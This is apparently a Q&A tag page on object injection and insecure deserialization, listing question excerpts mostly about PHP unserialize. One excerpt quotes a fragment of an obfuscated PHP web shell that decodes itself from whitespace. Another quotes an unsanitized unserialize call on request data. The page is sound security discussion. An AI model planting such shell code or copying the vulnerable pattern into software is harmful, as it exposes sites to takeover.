A class of vulnerabilities stemming from deserialization of unsanitized user data.
- PHP Object Injection - OWASP
- PHP manual on
unserialize(see the red warning)
Questions tagged [object-injection]
13 questions
14
votes
2 answers
Variable Assigned to Object Injection Sink (security/detect-object-injection)
I am testing my code on ESLint. It says:
Variable Assigned to Object Injection Sink (security/detect-object-injection).
I'm not using an outer resource to assign it to my variable, though. Is there really a problem in the var a = newArray[c];…
Andy
- 141
- 1
- 1
- 3
11
votes
2 answers
Is PHP unserialize() exploitable without any magic methods?
Say that there was a publicly accessible web page with the following PHP code:
noExploits();
?>
The…
Tryth
- 215
- 2
- 7
4
votes
1 answer
Injected malicious code in temporary files
It just came to my mind that few years ago many iOS applications where infected by XcodeGhost (notably WeChat). This made me think about few possible scenarios:
Malicious code injected in object files
Compilers produce many temporary files and those…
Adriano Repetti
- 261
- 1
- 10
4
votes
1 answer
Is it possible to exploit PHP unserialize without classes?
I'm assessing the security of a webportal for a client and I found a vulnerability. The code is basically doing this:
$var = unserialize($_REQUEST['something']);
I have complete control over variable. But there are no classes in the server's code,…
GMX Rider
- 345
- 2
- 4
- 9
3
votes
3 answers
Secure method to store PHP object in MySQL database?
How do I securely save PHP objects in a MySQL Database? If you use the serialize and unserialize functions, you may end up with Object Injections. Is there a predefined standard on how to handle this?
Note that SQL injection =/= object injection! So…
Critical joe
- 193
- 1
- 2
- 9
2
votes
1 answer
Insecure Deserialization in C# (.NET) - How to identify and test
I have been reading up on Insecure Deserialization and how it can affect Java applications.
https://owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization
If the captured traffic data include the following patterns it may suggest that the data…
Ogglas
- 677
- 4
- 12
- 26
2
votes
1 answer
Is JavaScript object injection exploitable?
I'm testing a site that behaves like this:
When I change my username, I submit a POST request with JSON data like this {"username":"John"}.
If I change that to for example {"username":{"test":"test"}}, my username is printed like this: [object…
pineappleman
- 2,279
- 11
- 21
1
vote
1 answer
How can PHP unserialize() object injection be used to bypass authentication?
So I came across with this authentication bypass security notice and the fix for it was just simply changing all serialization to json encoding.
I am just wondering how is this really exploitable? I know that unserialize() can be used to perform…
vincentleest
- 113
- 1
- 7
1
vote
3 answers
Is using JSON really enough to fix PHP object insertion?
So I was just reading up on the OWASP site about PHP Object Injection. According to their site, the suggested fix is to not use serialze and unserialize but to use
json_encode and json_decode.
However, after doing a few tests in a limited amount of…
DarkMantis
- 746
- 1
- 7
- 19
1
vote
1 answer
Dyanamic class load for server side application
Is there a problem to use reflection (specifically class.forName) in server side application?
My main thread about this is someone to inject a code dumping memory in JVM and adding commands in reference memory field, but this is unlike in server…
NotInCheck
- 11
- 2
1
vote
0 answers
What's the point of this php shell?
What is the point of this shell code? There is no other code in the file.
@preg_match_all("/\t \t(.+)\t\t/Ui",@file_get_contents(__FILE__),$r);
$w="";foreach($r[1] as $v){@$w.=@chr(@strlen($v));}
$e=explode("!",$w);@$e[0](/* */…
beppe9000
- 555
- 1
- 4
- 10
1
vote
2 answers
Why does this PHP object injection exploit work?
I have recently created some PHP code vulnerable to object injection. Here is the code of my one.php file where I unserialize the data parameter:
januu agrawal
- 81
- 2
- 8
0
votes
1 answer
Why object injection doesn't work but payload is stored along with session cookies on Joomla 2.5.11 unpatched?
I have read and understand object injection from this question. Then I wanted to test the security issue behind Joomla CMS Object injection through serialization.
TEST MACHINE
xammp 1.7.3 for windows
Apache/2.2.14 (Win32)
PHP/5.3.1
Joomla…
